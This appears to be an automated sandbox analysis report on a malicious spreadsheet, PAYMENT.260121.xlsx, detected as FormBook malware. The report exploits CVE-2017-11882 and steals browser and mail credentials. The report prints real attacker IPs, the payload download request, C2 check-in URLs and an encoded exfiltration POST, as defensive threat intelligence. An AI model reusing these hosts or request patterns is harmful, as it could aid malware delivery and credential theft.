Analysis Report PAYMENT.260121.xlsx

Overview

General Information

Sample Name: PAYMENT.260121.xlsx
Analysis ID: 344564
MD5: 9d192a4361c7306893b334fadb9471d2
SHA1: 4ba2040bc38aa9c14d0a9c25ba50104279de2e1d
SHA256: 8f61dce0f0bc33e2ccefc5ef5fd22ced3466ae4c5d2832bfa5d05d97b7e6a51f

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 7.2.ieinstal.exe.10410000.3.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbf", "KEY1_OFFSET 0x1d5ad", "CONFIG SIZE : 0xdf", "CONFIG OFFSET 0x1d6ab", "URL SIZE : 29", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x7ac7bcd0", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
Multi AV Scanner detection for submitted file
Source: PAYMENT.260121.xlsx Virustotal: Detection: 48% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2348540076.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2208647364.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2208738131.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2348255135.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2246966477.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2348494474.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2211993534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Dhdvyxwl[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\name.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: PAYMENT.260121.xlsx Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.ieinstal.exe.10410000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.22:49168 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: wntdll.pdb source: ieinstal.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: ieinstal.exe, 00000007.00000002.2208709008.00000000002F0000.00000040.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi 7_2_10426C93
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop edi 9_2_00096C99
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 4x nop then pop edi 10_2_00187250
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 4x nop then pop edi 10_2_0018724B
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 4x nop then pop ebx 10_2_00180B24
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 4x nop then pop edi 10_2_0018F3C0
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 4x nop then pop edi 10_2_00190597
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 4x nop then pop edi 10_2_001905A0
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 4x nop then pop ebx 10_2_001806C0
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Code function: 4x nop then pop esi 10_2_0018FFB0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cdn.discordapp.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 162.159.133.233:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.235.129.146:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.64.104.167:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.64.104.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 45.64.104.167:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Jan 2021 16:57:28 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Tue, 26 Jan 2021 06:41:44 GMTETag: "9ae00-5b9c7f2a3ba00"Accept-Ranges: bytesContent-Length: 634368Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0c 06 00 00 9e 03 00 00 00 00 00 a4 1a 06 00 00 10 00 00 00 20 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 4a 22 00 00 00 50 07 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 e8 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 14 0b 06 00 00 10 00 00 00 0c 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 24 59 00 00 00 20 06 00 00 5a 00 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 41 0f 00 00 00 80 06 00 00 00 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 4a 22 00 00 00 90 06 00 00 24 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 c0 06 00 00 00 00 00 00 8e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 d0 06 00 00 02 00 00 00 8e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e8 6e 00 00 00 e0 06 00 00 70 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 ae 02 00 00 50 07 00 00 ae 02 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 ae 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /kzd/?GtxX7=dr20ipJ0iR&LPF4=8eW2WVsvRouSa6Xf3pbAiO1FGOIM9VRVJlThWXBFlsK1Ao6/KwWvckUSkbtm91X4z/Tb2Q==&sql=1 HTTP/1.1Host: www.clearkhelo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kzd/?LPF4=wZMolADuYDGcdgh+LUa/jyP2+YrvU0bz/FVPopzBFpO6gq8lUBKfHyBxkGzB3veyz2otnQ==&GtxX7=dr20ipJ0iR&sql=1 HTTP/1.1Host: www.worldwide-mt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN
Source: Joe Sandbox View ASN Name: ITLDC-NLUA ITLDC-NLUA
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: unknown TCP traffic detected without corresponding DNS query: 91.235.129.146
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Dhdvyxwl[1].exe Jump to behavior
Source: global traffic HTTP traffic detected: GET /Dhdvyxwl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.235.129.146Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kzd/?GtxX7=dr20ipJ0iR&LPF4=8eW2WVsvRouSa6Xf3pbAiO1FGOIM9VRVJlThWXBFlsK1Ao6/KwWvckUSkbtm91X4z/Tb2Q==&sql=1 HTTP/1.1Host: www.clearkhelo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kzd/?LPF4=wZMolADuYDGcdgh+LUa/jyP2+YrvU0bz/FVPopzBFpO6gq8lUBKfHyBxkGzB3veyz2otnQ==&GtxX7=dr20ipJ0iR&sql=1 HTTP/1.1Host: www.worldwide-mt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: ieinstal.exe, 00000007.00000002.2209174425.0000000001FA0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: unknown HTTP traffic detected: POST /kzd/ HTTP/1.1Host: www.clearkhelo.comConnection: closeContent-Length: 268762Cache-Control: no-cacheOrigin: http://www.clearkhelo.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.clearkhelo.com/kzd/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 50 46 34 3d 30 38 61 4d 49 31 6b 4d 55 73 47 46 49 72 71 63 74 4d 32 62 36 72 59 6b 4b 65 70 62 39 68 4d 55 56 41 6d 69 57 6c 74 4a 71 64 4c 32 51 37 4b 39 42 31 61 50 45 33 35 7a 37 50 42 63 36 30 76 57 77 63 62 73 74 65 49 48 64 48 70 6c 70 58 37 52 51 63 38 77 63 4f 70 42 4e 55 30 6c 41 37 6f 75 76 47 61 45 55 70 68 70 67 5a 30 42 57 45 4d 35 33 51 50 6d 74 73 32 74 39 5a 71 2d 7e 45 44 68 69 52 4c 47 65 51 30 5f 54 39 49 30 4b 58 65 46 28 43 33 48 43 30 74 37 32 6b 69 59 46 49 51 57 35 44 4d 42 57 77 32 50 62 31 47 49 48 53 4c 42 47 50 6c 73 58 59 64 6d 5a 78 72 72 49 46 28 51 74 4f 75 4c 61 6c 71 34 58 67 77 50 6a 34 42 31 66 62 57 36 4b 35 42 39 59 78 75 56 57 55 51 61 74 4a 46 30 37 58 37 47 66 72 28 50 39 4c 4f 7a 51 4b 44 34 56 6d 37 57 7e 75 48 77 75 57 57 67 6a 7a 4a 61 65 49 6c 48 59 4e 44 4a 58 50 28 37 56 6a 41 78 41 69 4c 75 38 45 4d 53 7a 75 70 56 64 78 66 61 4b 4c 74 6b 4e 72 57 2d 6b 4a 49 58 45 56 62 4e 42 5a 6c 73 6d 46 63 5a 4c 62 39 39 49 45 65 55 4f 45 6d 43 4f 51 57 52 4f 65 33 30 76 4a 71 74 66 63 41 6c 73 4c 4c 48 57 30 4e 34 6b 32 6c 55 65 6d 54 45 45 30 66 6f 37 77 51 54 4d 73 77 66 34 4f 56 69 4a 41 56 52 79 74 63 6a 4a 35 54 38 78 70 4b 35 43 39 4f 31 7e 7a 70 47 46 50 51 37 49 6f 68 56 52 71 4b 43 4e 2d 52 6a 5a 77 78 4c 75 4f 5a 68 49 4d 43 50 4e 6f 73 71 79 6c 4e 32 62 46 37 38 77 74 54 35 59 55 61 74 77 78 32 6a 74 54 35 32 62 57 6c 6f 67 56 36 38 66 69 64 46 77 31 52 68 65 6d 45 79 56 41 52 30 66 42 45 75 45 38 64 52 6d 39 64 54 47 35 50 73 51 67 77 66 6d 6b 6e 66 57 54 51 30 45 75 66 70 53 4a 4a 39 73 30 74 61 5a 70 44 6a 32 79 6f 57 34 6a 4f 58 34 57 6d 42 42 49 47 4c 70 6e 56 51 6a 62 4f 4e 57 51 32 2d 4e 74 42 58 4d 77 5a 47 6c 47 56 4d 79 78 30 62 58 66 7a 7a 41 71 47 43 73 39 54 63 4e 39 56 4a 50 48 42 50 38 31 65 69 57 5a 31 76 4e 4c 57 6c 37 4f 74 73 72 52 67 35 4a 6b 69 72 63 4e 68 51 62 51 75 71 42 62 30 5f 69 54 68 32 36 7a 6f 37 72 31 62 6c 47 41 28 46 6e 34 6b 33 4e 51 67 49 46 35 6a 63 4a 56 45 61 46 78 71 31 68 72 42 6c 71 71 4e 71 6b 5a 63 34 5a 32 45 44 48 61 4b 74 73 4e 69 78 71 4c 76 58 30 6f 4f 59 49 69 45 53 69 41 50 59 4b 52 37 53 6d 37 52 66 70 4a 64 72 32 41 72 66 6f 44 4a 44 43 72 30 30 70 76 73 55 6b 4d 6d 38 36 38 59 41 55 47 51 73 57 65 47 70 7e 77 67 76 4b 6d 53 74 47 46 6d 45 38 6a 72 44 50 4d 41 74 74 39 34 67 72 65 31 64 57 30 34 50 30 78 54 4e 32 50 66 66 6c 34 62 78 6f 4f 52 5a 74 6a 6f 38 6f 66 72 7a 67 59 6b 74 54 50 70 42 65 75 76 76 58 55 52 52 53 5a 77 2d 54 58 6e 4b 49 4d 38 74 49 74 59 4f 61 52 42 30 32 51 58 6d 62 35 7e 70 41 62 54 38 70 38 7a 39 74 37 46 5f 54 35 75 57
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Tue, 26 Jan 2021 16:58:40 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 